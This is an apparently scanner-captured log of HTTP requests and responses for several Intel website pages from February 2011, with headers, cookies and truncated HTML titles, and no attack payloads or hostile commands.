HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "c92d52101845cb1:4305" Last-Modified: Thu, 26 Aug 2010 12:13:16 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:12 GMT Content-Length: 90 Connection: close
GET /business/home HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:18:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:14 GMT Content-Length: 18367 Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=MKLFCODABCLJPLBODFGGNBKN; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
GET /business/vpro/alliance/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57048
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel vPro Technology Alliance</title>
GET /buy/ HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:14 GMT Content-Length: 26099 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Buy Intel® Products and Services . Intel Corporati ...[SNIP]...
GET /go/itp/index.htm?iid=subhdr+ptr_chan_itp HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:53 GMT Content-Length: 2016 Connection: close
<html> <TITLE>Redirect Page</TITLE>
<!-- project start date 06/22/10 --> <!-- Project end date 06/22/11 --> <!-- Project Owner (Phil Seward)-->
GET /intel/companyinfo/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:14 GMT Content-Length: 25926 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel's Corporate Values and Vision.</title>
GET /intel/corpresponsibility/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:08 GMT Content-Length: 31356 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Corporate Responsibility — With Leadership ...[SNIP]...
GET /newsroom/assets/images/ HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:21:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:06 GMT Content-Length: 18367 Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=OAFLKMPAABHFKKFICLMGCMIN; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Type: text/html Last-Modified: Fri, 28 Jan 2011 02:06:18 GMT Content-Language: en-US Server: IA Web Server Vary: Accept-Encoding Date: Sun, 06 Feb 2011 01:55:17 GMT Connection: close Content-Length: 5234
GET /pressroom/archive/releases/2010/20100125corp.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41207
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Plans Eight New Solar Installations in Four Stat ...[SNIP]...
GET /pressroom/execbios.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35376
GET /pressroom/jump/videobroadcast.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "85ee109f4988c81:4305" Last-Modified: Mon, 17 Mar 2008 16:11:56 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:22 GMT Content-Length: 579 Connection: close
